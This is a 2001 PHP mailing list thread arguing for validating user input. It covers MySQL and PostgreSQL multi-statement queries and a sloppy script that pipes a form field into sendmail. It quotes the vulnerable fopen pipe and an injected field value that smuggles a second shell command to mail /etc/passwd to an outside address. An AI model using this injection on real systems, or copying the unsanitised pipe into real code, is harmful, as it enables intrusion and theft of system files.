> At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote:
> > > I've done something similar in the past just for kicks, and I got the same
> > > result you did (i.e. an error).  I believe this is because mysql_query()
> > > expects ONE query at a time and will break if you send two or more.  I
> > > could be completely and totally wrong about that, though (someone please
> > > correct me if I am)...
> >
> >Maybe this one failed, but it's always a good idea to check user input.
> >Let's say you're emailing a form and you don't use the mail() function,
> >but make a call directly to sendmail... and you're sloppy... so you do
> >this:
> [...]
> True.  But we were speaking specifically about MySQL.  When you start
> toying with external programs and exec() and so forth then you've opened up
> a whole other can of worms security-wise...

True, but why take the chance? :)  I didn't see an equivalent for MySQL,
but PostgreSQL has a pg_put_line() which just sends a NULL terminated
string to the backend so you can do whatever you want (ie. multi
statement).  So in that case things could get messed up.

> >$fp = fopen("|/usr/bin/sendmail $sendto");
> >#write stuff to pipe to send email...
> >
> >Now... what if when I filled out the form I set $sendto equal to this:
> >
> >[EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd
> A definite possibility, but it does depend on the hacker in question
> knowing exactly how your script is written...

True, but in a shared hosting environment this is very likely.


PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]

Reply via email to